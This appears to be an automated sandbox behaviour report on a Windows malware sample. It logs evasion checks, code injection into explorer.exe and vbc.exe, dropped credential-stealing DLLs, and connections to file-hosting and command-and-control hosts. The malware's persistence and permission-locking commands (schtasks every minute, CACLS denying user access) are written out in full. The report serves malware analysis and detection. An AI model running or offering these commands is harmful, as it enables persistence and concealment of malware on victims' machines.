Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\tiddsjj:Zone.Identifier read attributes | delete

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3790.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6644.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6644.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: tiddsjj, 0000000B.00000002.378719538.0000000000B57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64

Opens the same file many times (likely Sandbox evasion)

Source: C:\Users\user\AppData\Local\Temp\453D.exe

File opened: C:\Users\user\AppData\Local\Temp\0.txt count: 74827

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiddsjj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiddsjj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiddsjj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiddsjj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiddsjj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiddsjj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Source: C:\Windows\explorer.exe TID: 2136	Thread sleep count: 646 > 30
Source: C:\Windows\explorer.exe TID: 4760	Thread sleep count: 448 > 30
Source: C:\Windows\explorer.exe TID: 4760	Thread sleep time: -44800s >= -30000s
Source: C:\Windows\explorer.exe TID: 5040	Thread sleep count: 300 > 30
Source: C:\Windows\explorer.exe TID: 5040	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1336	Thread sleep count: 454 > 30
Source: C:\Windows\explorer.exe TID: 4116	Thread sleep count: 282 > 30
Source: C:\Windows\explorer.exe TID: 4044	Thread sleep count: 257 > 30
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 5456	Thread sleep time: -510000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 160	Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 244	Thread sleep time: -1260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 3424	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888	Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6644.exe TID: 1920	Thread sleep count: 198 > 30
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe TID: 1096	Thread sleep count: 9999 > 30
Source: C:\Users\user\AppData\Local\Temp\816F.exe TID: 5396	Thread sleep count: 389 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004	Thread sleep count: 162 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004	Thread sleep time: -97200000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004	Thread sleep time: -600000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\59FE.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\59FE.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6644.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 360000
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 646
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 448
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 454
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Window / User API: threadDelayed 9999
Source: C:\Users\user\AppData\Local\Temp\816F.exe	Window / User API: threadDelayed 389

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PingboardCache\argq.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\86EE.exe

Registry key enumerated: More than 140 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Thread delayed: delay time: 360000
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 600000

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 816F.exe, 0000001A.00000002.533641862.0000000000844000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\w
Source: rovwer.exe, 0000000F.00000002.559360064.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.320883959.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: 2B4A.exe, 0000000C.00000002.553806034.0000000000870000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: rovwer.exe, 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8e
Source: explorer.exe, 00000001.00000000.316628124.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Ven_NECVMWar&Prod_VMware_SAT
Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 816F.exe, 0000001A.00000002.552068120.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe

System information queried: ModuleInformation

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\tiddsjj	System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00930D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_0093092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\tiddsjj	Code function: 11_2_00B483B3 push dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\tiddsjj	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Code function: 12_2_0040ADB0 GetProcessHeap,HeapFree,

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Code function: 12_2_02520490 LdrInitializeThunk,

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe	Code function: 12_2_004123F1 SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: cdn-102.anonfiles.com
Source: C:\Windows\explorer.exe	Domain query: bitbucket.org
Source: C:\Windows\explorer.exe	Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe	Domain query: u.to
Source: C:\Windows\explorer.exe	Domain query: github.com
Source: C:\Windows\explorer.exe	Domain query: raw.githubusercontent.com
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe	Domain query: anonfiles.com
Source: C:\Windows\explorer.exe	Domain query: hoteldostyk.com
Source: C:\Windows\explorer.exe	Domain query: iplogger.com
Source: C:\Windows\explorer.exe	Network Connect: 89.208.107.216 80
Source: C:\Windows\explorer.exe	Domain query: srshf.com
Source: C:\Windows\explorer.exe	Domain query: transfer.sh
Source: C:\Windows\explorer.exe	Domain query: 1ecosolution.it
Source: C:\Windows\explorer.exe	Network Connect: 193.56.146.168 80
Source: C:\Windows\explorer.exe	Domain query: cdn-104.anonfiles.com

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 6644.exe.1.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\tiddsjj	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\tiddsjj	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\6CEC.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	Memory written: C:\Users\user\AppData\Local\Temp\86EE.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\8C00.exe	Memory written: C:\Users\user\AppData\Local\Temp\8C00.exe base: 400000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe	Thread created: C:\Windows\explorer.exe EIP: 3321A28
Source: C:\Users\user\AppData\Roaming\tiddsjj	Thread created: unknown EIP: 5851A28

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 44B008

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 5612 base: CDF380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5928 base: 7FF69FF38150 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 1768 base: CDF380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5080 base: 7FF69FF38150 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 3780 base: CDF380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 1648 base: CDF380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 812 base: CDF380 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 6120 base: 7FF69FF38150 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5508 base: CDF380 value: 90

Source: C:\Users\user\AppData\Local\Temp\3790.exe	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
